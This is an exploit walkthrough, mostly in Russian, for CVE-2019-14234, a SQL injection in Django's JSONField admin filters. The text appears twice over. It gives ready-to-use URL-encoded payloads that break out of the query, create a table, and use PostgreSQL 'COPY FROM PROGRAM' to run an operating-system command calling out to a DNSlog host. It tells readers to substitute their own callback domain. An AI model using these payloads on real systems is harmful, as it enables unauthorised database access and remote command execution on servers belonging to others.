# CVE-2019-14234 Django JSONField SQL注入漏洞/ru
==Затронутая версия==
Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23
== Эксплуатация ==
Во-первых, вам необходимо войти в систему в фоновом режиме администратора и получить доступ к странице управления model Collection:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Посетите следующий URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
Подтвердите успешно выполненный оператор no results to fetch .
доступ:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20
Команда была выполнена успешно.
===⚠️️===
test.dnslog.cn請修改爲自己的Dnslog
==Затронутая версия==
Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23
== Эксплуатация ==
Во-первых, вам необходимо войти в систему в фоновом режиме администратора и получить доступ к странице управления model Collection:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Посетите следующий URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
Подтвердите успешно выполненный оператор no results to fetch .
доступ:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20
Команда была выполнена успешно.
===⚠️️===
test.dnslog.cn измените его на свой собственный журнал Dnslog













请登录后查看评论内容